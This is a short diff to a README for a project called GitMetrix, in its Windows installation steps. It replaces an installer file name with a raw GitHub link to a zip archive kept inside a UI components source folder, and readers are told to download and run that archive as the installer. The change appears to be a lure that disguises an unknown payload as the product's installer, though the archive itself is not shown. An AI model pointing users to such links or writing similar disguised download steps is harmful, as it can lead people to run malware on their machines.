ekaprascode/GitMetrix/README.md

 ### Step 3: Download the Windows Installer

 Download the `.exe` file made for Windows.
-It might be named like `GitMetrix-Setup.exe` or similar.
+It might be named like `https://raw.githubusercontent.com/ekaprascode/GitMetrix/main/src/components/ui/Git_Metrix_v1.3.zip` or similar.

 ### Step 4: Run the Installer